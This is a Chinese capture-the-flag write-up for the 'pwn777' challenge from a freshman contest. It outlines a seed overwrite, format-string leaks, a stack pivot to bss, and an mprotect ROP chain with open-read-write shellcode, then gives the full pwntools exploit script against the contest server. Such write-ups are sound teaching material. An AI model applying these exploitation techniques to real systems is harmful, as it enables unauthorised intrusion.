成都信息工程大学的新生赛,有点失望,pwn的题目水到爆炸,就一题pwn777有点意思。
附件下载:https://pan.baidu.com/s/1mEDAOE3Pz-x0oH4-eTcR-Q 提取码: 3pte
大体思路:
栈溢出改随机种子,然后伪随机数绕过。再格式化字符串泄露一波地址。
因为开了sandbox,禁用了execve,那么one_gadget与system这些也都不能用,所以考虑利用mprotect修改权限,再直接打orw的shellcode拿flag。
注意到有bss段上的格式化字符串漏洞,通过在栈上找链利用,最终将需要修改的地址弄到栈上,按此方式修改rbp与ret,进行栈迁移,迁移到bss段,执行shellcode即可。
参考exp如下:
from pwn import *
context(os = "linux", arch = "amd64", log_level = "debug")
io = remote("47.242.20.238", 7777)
nums = [1804289383, 846930886, 1681692777, 1714636915, 1957747793, 424238335, 719885386, 1649760492, 596516649, 1189641421]
libc = ELF("./libc-2.23.so")
elf = ELF('./pwn')
io.recvuntil("name\n")
payload = b'a'*24 + p32(0)
io.send(payload)
for i in range(10):
io.recvuntil("number:")
io.sendline(str(nums[i]).encode())
io.recvuntil("best!\n")
io.sendline(b'%13$p%6$p%11$p')
libc_addr = int(io.recv(14)[2:14], 16)
base1 = libc_addr - 240 - libc.sym["__libc_start_main"]
log.info('LIBC:\t' + hex(base1))
mprotect_addr = base1 + libc.sym["mprotect"]
log.info('mprotect_addr:\t' + hex(mprotect_addr))
addr = int(io.recv(14)[10:14], 16)
main_addr = int(io.recv(14)[2:14], 16)
base2 = main_addr - 0x16a8
log.info('PIE:\t' + hex(base2))
log.info('BSS:\t' + hex(elf.bss()))
bss_addr = base2 + 0x4060 + 16 - 8
leave_addr = base2 + 0x1676
log.info('bss_addr:\t' + hex(bss_addr))
log.info('leave_addr:\t' + hex(leave_addr))
val = addr + 8
payload = flat("%" + str(val) + "c%6$hn")
io.sendline(payload)
payload = flat("%" + str((leave_addr & 0xFF)) + "c%10$hhn")
io.sendline(payload)
val = addr
payload = flat("%" + str(val) + "c%15$hn")
io.sendline(payload)
payload = flat("%" + str(bss_addr & 0xFFFF) + "c%41$hn")
io.sendline(payload)
val = addr + 2
payload = flat("%" + str(val) + "c%15$hn")
io.sendline(payload)
payload = flat("%" + str((bss_addr >> 16) & 0xFFFF) + "c%41$hn")
io.sendline(payload)
val = addr + 4
payload = flat("%" + str(val) + "c%15$hn")
io.sendline(payload)
payload = flat("%" + str((bss_addr >> 32) & 0xFFFF) + "c%41$hn")
io.sendline(payload)
shellcode='''
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
mov rax, 2
mov rdi, 0x67616c662f2e
push rdi
mov rdi, rsp
syscall
mov rdx, 0x100
mov rsi, rdi
mov rdi, rax
mov rax, 0
syscall
mov rdi, 1
mov rax, 1
syscall
'''
pop_rdi_ret = base1 + 0x21112
pop_rsi_ret = base1 + 0x202f8
pop_rdx_ret = base1 + 0x1b92
payload = b'jiaraniloveyou~\x00'
payload += p64(pop_rdi_ret)
payload += p64(bss_addr & 0xFFFFFFFFFFFFF000)
payload += p64(pop_rsi_ret)
payload += p64(0x1000)
payload += p64(pop_rdx_ret)
payload += p64(7)
payload += p64(mprotect_addr)
payload += p64(bss_addr + len(payload))
payload += asm(shellcode)
io.sendline(payload)
io.interactive()